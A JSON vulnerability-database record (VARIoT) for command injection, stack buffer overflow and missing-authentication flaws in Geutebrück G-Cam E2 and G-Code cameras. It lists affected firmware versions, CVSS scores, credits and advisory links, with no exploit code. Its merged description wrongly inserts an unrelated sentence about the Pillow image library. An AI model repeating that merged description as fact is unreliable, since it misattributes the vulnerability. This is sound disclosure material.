            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33553"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33553"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:23.597000",
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:52.310000",
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in G-Cam E2 and G-Code made by GEUTEBRUCK",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0600

    Vulnerability from variot - Updated: 2025-01-30 20:36

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the profile parameter, which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code, provided by GEUTEBRUCK: * Lack of authentication for important features (CWE-306) - CVE-2021-33543; * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554; * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability (the per-vulnerability impact list is not reproduced in this summary). Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0600",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33547",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33547",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33547",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33547",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33547",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2090",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-33547",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-33547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the profile parameter, which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code, provided by GEUTEBRUCK: * Lack of authentication for important features (CWE-306) - CVE-2021-33543; * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554; * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability; please follow CNNVD or manufacturer announcements.",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33547"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33547",
            "trust": 2.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33547",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "id": "VAR-202109-0600",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T20:36:43.383000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK\u2019s web portal (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2  and  G-Code Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=158070"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.7,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33547"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/121.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33547"
          },
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          },
          {
            "date": "2021-09-13T18:15:22.420000",
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-27T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33547"
          },
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          },
          {
            "date": "2021-09-27T14:30:58.053000",
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
